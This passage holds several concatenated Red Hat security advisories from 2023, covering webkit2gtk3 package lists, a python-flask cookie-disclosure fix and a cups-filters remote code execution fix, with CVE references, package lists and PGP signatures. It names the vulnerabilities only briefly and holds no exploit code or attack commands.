webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28204  
https://access.redhat.com/security/cve/CVE-2023-32373  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH54RdzjgjWX9erEAQiM7A//TKXn2wpY6wdYmxPDnxde9QRSLmDWvzpQ  
0DDeU7as/ZzwMJkoDoBstFnj3r02GnkRpn5CCshiJK0uqQY/Q/4T3d+y0Co+t2lP  
6wm/v2wkpoSy3CrVIBoIrN93WTXpOWKqyNUX1e7TiPCfATtKiLQg2a9Qmcs6A7Le  
NYS5kdTYIVWsTy1WR6hcbAJozraUNXU60sW5XoViKoR5WsnsFfTXX4v06vhxnW6p  
NR6+I4FyrEtQNo2+UuSQ0eEBEmUaH11CnrNl1TzagKZm49f3nf112ef895GNgxXG  
pGthaReUfwQilgIXMqwv+ei24npA1X/t+RIpazzhUHXh9gmjiGaLMyrEuDpVAwzk  
HEd3R/B7H+lDouoSJbAJ5H0IuMyjOYUZ3Y3JBKhzMGn0ASdCLYX5zQUSzJbBWqsh  
qOU43YUQ3GyODM3qhrQkIzSicNUacYP/ysTi8Lm7nZmGTZdVvTHYO+iobfZ/cvGJ  
IjvjqwA7D0Rgp28fKVdfAw6BNEdd0fonPTZhMn1fCm45v7F6Bdc49khnASX6Scqx  
2ifRaoVupFGKg8uQ+BaYKrCcGlXfO2jj8P/41JUJfaerYMKzqG5HGR6wlplcOfxt  
eCy3c+ItcyacSYViLVq6/jB9ynrRV0gwjVPlOdV3eBgWi4JDsXMx4EQQ171g/ee1  
EnHoatQ58/E=  
=8Vmi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3432-01

Red Hat Security Advisory 2023-3440-01 - An update for python-flask is now available for Red Hat OpenStack Platform 17.0 (Wallaby).

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 17.0 (python-flask) security update  
Advisory ID:       RHSA-2023:3440-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3440  
Issue date:        2023-06-05  
CVE Names:         CVE-2023-30861   
=====================================================================

1. Summary:

An update for python-flask is now available for Red Hat OpenStack Platform  
17.0 (Wallaby).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 17.0 - noarch

3. Description:

Flask is called a “micro-framework” because the idea to keep the core  
simple but extensible. There is no database abstraction layer, no form  
validation or anything else where different libraries already exist that  
can handle that. However Flask knows the concept of extensions that can add  
this functionality into your application as if it was implemented in Flask  
itself. There are currently extensions for object relational mappers, form  
validation, upload handling, various open authentication technologies and  
more.

Security Fix(es):

* Possible disclosure of permanent session cookie due to missing Vary:  
Cookie header (CVE-2023-30861)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2196643 - CVE-2023-30861 flask: Possible disclosure of permanent session cookie due to missing Vary: Cookie header

6. Package List:

Red Hat OpenStack Platform 17.0:

Source:  
python-flask-1.1.2-6.el9ost.src.rpm

noarch:  
python3-flask-1.1.2-6.el9ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30861  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH538dzjgjWX9erEAQhxqg/8DysCxcTh0YuNH19oiiaAi/7+77JHXXou  
FPeUpkKfeif2eWiAm4wJHKMLEOSQnFsgfEJcAk0bopl8OiANMV6d7e7/IH3mV5Eo  
ENEpzSa73CcB0ZGhk7DWa7mFh22nevh4a5a8wKU+PPEF4eHnIJzzl9K2hBvAwpZ/  
D2oM3Z0UrtGJPw+2xbqSgJfaIubKhm4PZSgLnL92k6XmuPrVxTyDPrvrtfXjXgaU  
e9fjoMTO/Z0lotdFSZUyBJSNOKwoI3CTo/XZAfzv9FRyLVtiyP1CpUnvuHZqQKzs  
dqRjDBNtt0YU8d6koT/WhXHePf4HUndpScoypjoBFtTr0VAZIN3meGjjsv7f0x3b  
bc8Li7ARUmGS91canC0q+AX1POyJUnLj4clv3gDPFk/qlY9xg6kgt8r4Yl9hSI7O  
fDVS/f/L+4fZ+0QK+V4lDxzf7b9pFLbofTIDm3SvuNvIYjgb2I49CVCkpJqCNdzL  
HPywLWSsBRGcFeklDPlgOmTJ9y/U9y+e9/4GgZr42Y8MG+bUhq/eOoXa4zmmSh0N  
t9Kuy4bNMFcqHJvyGWTNS87uXE+jRhsg6W3iFwwrEQrc2IrQ10+/PKewWkqZgCTd  
ZtYgaIBaqlLVfrJEjkjKsIUhQGCAOEmqUnMsz5eY3Dja6NoPQziekHmwcJDZIDTi  
o0D9zApP3T8=  
=OFiY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3440-01

Red Hat Security Advisory 2023-3425-01 - The cups-filters package contains back ends, filters, and other software that was once part of the core Common UNIX Printing System distribution but is now maintained independently. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: cups-filters security update  
Advisory ID:       RHSA-2023:3425-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3425  
Issue date:        2023-06-02  
CVE Names:         CVE-2023-24805   
=====================================================================

1. Summary:

An update for cups-filters is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The cups-filters package contains back ends, filters, and other software  
that was once part of the core Common UNIX Printing System (CUPS)  
distribution but is now maintained independently.

Security Fix(es):

* cups-filters: remote code execution in cups-filters, beh CUPS backend  
(CVE-2023-24805)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2203051 - CVE-2023-24805 cups-filters: remote code execution in cups-filters, beh CUPS backend

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
cups-filters-1.20.0-29.el8_8.2.src.rpm

aarch64:  
cups-filters-1.20.0-29.el8_8.2.aarch64.rpm  
cups-filters-debuginfo-1.20.0-29.el8_8.2.aarch64.rpm  
cups-filters-debugsource-1.20.0-29.el8_8.2.aarch64.rpm  
cups-filters-libs-1.20.0-29.el8_8.2.aarch64.rpm  
cups-filters-libs-debuginfo-1.20.0-29.el8_8.2.aarch64.rpm

ppc64le:  
cups-filters-1.20.0-29.el8_8.2.ppc64le.rpm  
cups-filters-debuginfo-1.20.0-29.el8_8.2.ppc64le.rpm  
cups-filters-debugsource-1.20.0-29.el8_8.2.ppc64le.rpm  
cups-filters-libs-1.20.0-29.el8_8.2.ppc64le.rpm  
cups-filters-libs-debuginfo-1.20.0-29.el8_8.2.ppc64le.rpm

s390x:  
cups-filters-1.20.0-29.el8_8.2.s390x.rpm  
cups-filters-debuginfo-1.20.0-29.el8_8.2.s390x.rpm  
cups-filters-debugsource-1.20.0-29.el8_8.2.s390x.rpm  
cups-filters-libs-1.20.0-29.el8_8.2.s390x.rpm  
cups-filters-libs-debuginfo-1.20.0-29.el8_8.2.s390x.rpm

x86_64:  
cups-filters-1.20.0-29.el8_8.2.x86_64.rpm  
cups-filters-debuginfo-1.20.0-29.el8_8.2.i686.rpm  
cups-filters-debuginfo-1.20.0-29.el8_8.2.x86_64.rpm  
cups-filters-debugsource-1.20.0-29.el8_8.2.i686.rpm  
cups-filters-debugsource-1.20.0-29.el8_8.2.x86_64.rpm  
cups-filters-libs-1.20.0-29.el8_8.2.i686.rpm  
cups-filters-libs-1.20.0-29.el8_8.2.x86_64.rpm  
cups-filters-libs-debuginfo-1.20.0-29.el8_8.2.i686.rpm  
cups-filters-libs-debuginfo-1.20.0-29.el8_8.2.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
cups-filters-debuginfo-1.20.0-29.el8_8.2.aarch64.rpm  
cups-filters-debugsource-1.20.0-29.el8_8.2.aarch64.rpm  
cups-filters-devel-1.20.0-29.el8_8.2.aarch64.rpm  
cups-filters-libs-debuginfo-1.20.0-29.el8_8.2.aarch64.rpm

ppc64le:  
cups-filters-debuginfo-1.20.0-29.el8_8.2.ppc64le.rpm  
cups-filters-debugsource-1.20.0-29.el8_8.2.ppc64le.rpm  
cups-filters-devel-1.20.0-29.el8_8.2.ppc64le.rpm  
cups-filters-libs-debuginfo-1.20.0-29.el8_8.2.ppc64le.rpm

s390x:  
cups-filters-debuginfo-1.20.0-29.el8_8.2.s390x.rpm  
cups-filters-debugsource-1.20.0-29.el8_8.2.s390x.rpm  
cups-filters-devel-1.20.0-29.el8_8.2.s390x.rpm  
cups-filters-libs-debuginfo-1.20.0-29.el8_8.2.s390x.rpm

x86_64:  
cups-filters-debuginfo-1.20.0-29.el8_8.2.i686.rpm  
cups-filters-debuginfo-1.20.0-29.el8_8.2.x86_64.rpm  
cups-filters-debugsource-1.20.0-29.el8_8.2.i686.rpm  
cups-filters-debugsource-1.20.0-29.el8_8.2.x86_64.rpm  
cups-filters-devel-1.20.0-29.el8_8.2.i686.rpm  
cups-filters-devel-1.20.0-29.el8_8.2.x86_64.rpm  
cups-filters-libs-debuginfo-1.20.0-29.el8_8.2.i686.rpm  
cups-filters-libs-debuginfo-1.20.0-29.el8_8.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24805  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH53xtzjgjWX9erEAQinZQ//e8C3UZz2YSdb+iZcCQkHvpAXS5G4OnnF  
+TDdAQ+fdNuXkMzQey2UEl8/h/0xyEJqF33gOlbgEtIAHNtNR2WP6Wk1HgGNZONA  
teCMda5qliPG0L8H/t/sgNqrWxhQnGE4LbKLQLTXn8Bq0sZhSlZyiSBK4wLxURjS  
Ospqc6yZYpceh/AxJeN8UPkZqWtPq1U4GEVBeb6fQJNPKsCCORCZ+tQYlZlarZJ0  
TnWtzFnDCiAzgck/BKiu16KT4MLGwAzyAGVup3fMcumSkNqvfUtrlNeH7aO4CYMe  
wBmUtKubwrcxQielC/vMwIAZ2F6kgroqyuYrIubUQ/+DvyySy9J8QZmKjF2gc5h4  
yGkrjJEH2tTjdIPa2RF+9oVAKd+MuWj6K2dn0C0y1P8T7903JLt3IV1CYJiO8/Nu  
oWQginskxa+zMwpCeoRzqjx7ZjGUv89MQoh4c4QyD3iWs1suDGFLFbuUGKaX/mpx  
WhIyqOPGFw6jAfWUmW1kbmIjMPNniKLAcxy8Z1tugHfONAgpImbR3DA1KPzyUmQ2  
zssn6Mzn8L10r3oyXPoVJzXhRinbgLjrEuW9APDZR4vgC+8xWfbAO46EBMmjTrsN  
cmDILmHdkpM1Re8/0B8a3DE+y9X2QJi8jVDM/3s+7c8ccdHOu+Re5fMZ8zbFvhQo  
kJ9fZbZQauo=  
=3N+S  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js